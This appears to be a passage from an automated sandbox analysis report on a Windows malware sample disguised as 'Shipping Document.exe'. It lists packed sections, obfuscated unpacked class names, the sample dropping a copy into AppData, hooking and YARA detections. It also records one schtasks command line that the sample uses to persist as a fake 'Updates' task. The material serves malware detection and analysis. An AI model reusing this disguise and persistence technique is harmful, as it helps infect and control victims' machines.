                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401E14 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401EDA push ebp; ret 10_2_00401EE8
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00413FFA push ebp; ret 10_2_00414005
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010D225F pushad ; ret 10_2_010D27F9
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010D27FA pushad ; ret 10_2_010D27F9
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011009AD push ecx; mov dword ptr [esp], ecx 10_2_011009B6
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010D283D push eax; iretd 10_2_010D2858
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010D1368 push eax; iretd 10_2_010D1369
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Code function: 12_2_04BBC97C push eax; ret 12_2_04BBC949
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Code function: 12_2_04BBF258 push eax; ret 12_2_04BBF259
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Code function: 12_2_084630D1 pushad ; iretd 12_2_084630D3
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Code function: 12_2_08464243 pushfd ; iretd 12_2_08464245
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Code function: 12_2_08463CC6 push ss; iretd 12_2_08463CC7
                Source: Shipping Document.exe | Static PE information: section name: taM%C#%u entropy: 7.998629772185087
                Source: Shipping Document.exe | Static PE information: section name: .text entropy: 7.9337476307846275
                Source: KOENBvWt.exe.0.dr | Static PE information: section name: taM%C#%u entropy: 7.998629772185087
                Source: KOENBvWt.exe.0.dr | Static PE information: section name: .text entropy: 7.9337476307846275
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs | High entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, QK1XyLcrf1gUppmsAj.cs | High entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, pmYHbZ63s7duoTHIGq.cs | High entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F6CiRLgqx6Lxnpnjqk.cs | High entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, m4ifnYVmIeQeNVfHwS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, cZaLqkrPjuZss87qNC.cs | High entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, w0cHSBC9YZ920FR27s.cs | High entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, SEHKQw3SBefxUN5Qlk.cs | High entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, NNA24mLJObF0Y8gmVg.cs | High entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, DI9IOsHnWmXiyPv2gr.cs | High entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, mYuBxX5y3QFtX3Y1Qp.cs | High entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.cs | High entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, V9a8Lxh7SJDtCArE0g.cs | High entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, YkER94q6wgiamQlpyt.cs | High entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, XxRrBoRYHAhRJ9d1hx.cs | High entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, K13cVp77eDhDLX23eCa.cs | High entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, LVixqdDKiqODDhE0AD.cs | High entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, EUCmVyzOIn3f4YK45Z.cs | High entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, VtRbyDAZjAG166sI2i.cs | High entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, nMxMf67AEbxBe3ZHhK8.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, vj1yyY7TvHQ5YX1cMa9.cs | High entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs | High entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, QK1XyLcrf1gUppmsAj.cs | High entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, pmYHbZ63s7duoTHIGq.cs | High entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F6CiRLgqx6Lxnpnjqk.cs | High entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, m4ifnYVmIeQeNVfHwS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, cZaLqkrPjuZss87qNC.cs | High entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, w0cHSBC9YZ920FR27s.cs | High entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, SEHKQw3SBefxUN5Qlk.cs | High entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, NNA24mLJObF0Y8gmVg.cs | High entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, DI9IOsHnWmXiyPv2gr.cs | High entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, mYuBxX5y3QFtX3Y1Qp.cs | High entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F7dFk7fClPC3QVcrtR.cs | High entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, V9a8Lxh7SJDtCArE0g.cs | High entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, YkER94q6wgiamQlpyt.cs | High entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, XxRrBoRYHAhRJ9d1hx.cs | High entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, K13cVp77eDhDLX23eCa.cs | High entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, LVixqdDKiqODDhE0AD.cs | High entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, EUCmVyzOIn3f4YK45Z.cs | High entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, VtRbyDAZjAG166sI2i.cs | High entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, nMxMf67AEbxBe3ZHhK8.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, vj1yyY7TvHQ5YX1cMa9.cs | High entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs | High entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, QK1XyLcrf1gUppmsAj.cs | High entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, pmYHbZ63s7duoTHIGq.cs | High entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F6CiRLgqx6Lxnpnjqk.cs | High entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, m4ifnYVmIeQeNVfHwS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, cZaLqkrPjuZss87qNC.cs | High entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, w0cHSBC9YZ920FR27s.cs | High entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, SEHKQw3SBefxUN5Qlk.cs | High entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, NNA24mLJObF0Y8gmVg.cs | High entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, DI9IOsHnWmXiyPv2gr.cs | High entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, mYuBxX5y3QFtX3Y1Qp.cs | High entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, F7dFk7fClPC3QVcrtR.cs | High entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, V9a8Lxh7SJDtCArE0g.cs | High entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, YkER94q6wgiamQlpyt.cs | High entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, XxRrBoRYHAhRJ9d1hx.cs | High entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, K13cVp77eDhDLX23eCa.cs | High entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, LVixqdDKiqODDhE0AD.cs | High entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, EUCmVyzOIn3f4YK45Z.cs | High entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, VtRbyDAZjAG166sI2i.cs | High entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, nMxMf67AEbxBe3ZHhK8.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, vj1yyY7TvHQ5YX1cMa9.cs | High entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: C:\Users\user\Desktop\Shipping Document.exe | File created: C:\Users\user\AppData\Roaming\KOENBvWt.exe

                Boot Survival

                Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\Shipping Document.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara match | File source: Process Memory Space: Shipping Document.exe PID: 7076, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: KOENBvWt.exe PID: 1260, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\xcopy.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: B50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 4700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 4E40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 5E40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 5F70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: 6F70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: B470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: C470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: C900000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Memory allocated: D900000 memory reserve | memory write watch
